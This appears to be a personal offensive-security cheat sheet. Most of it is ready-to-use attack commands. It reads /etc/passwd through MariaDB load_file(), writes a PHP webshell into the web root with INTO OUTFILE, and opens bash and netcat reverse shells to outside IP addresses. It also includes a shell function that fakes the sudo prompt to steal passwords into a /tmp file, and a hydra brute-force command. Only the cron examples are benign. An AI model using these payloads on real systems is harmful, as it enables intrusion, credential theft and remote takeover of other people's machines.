Useful things
General
when we have enough privileges in mariadb we can use the function load_file() to read files that we are interested in. Example:
select load_file("/etc/passwd");
SELECT ... INTO OUTFILE
to write a file. Example:
select "<?php phpinfo() ?>" into outfile "/var/www/html/shell.php";
we can put some webshell instead of phpinfo().
Simple Bash Shell:
bash -i >& /dev/tcp/1.2.3.4/4321 0>&1
Netcat Shell: nc 192.168.6.1 1234 -e /bin/bash
To steal sudo password
function sudo () {
realsudo="$(which sudo)"
read -s -p "[sudo] password for $USER: " inputPasswd
printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/hackedPasswd.txt
$realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1
$realsudo "${@:1}"
}
Cron time string
30 * * * *
Execute a command at 30 minutes past the hour, every hour.
0 13 * * 1
Execute a command at 1:00 p.m. UTC every Monday.
*/5 * * * *
Execute a command every five minutes.
0 */2 * * *
Execute a command every second hour, on the hour.
hydra
When we have wordlist like:
admin:admin
admin:password
...
We have to use -C in hydra. Example:
hydra -C wordlist.txt ftp://<vuln_ip>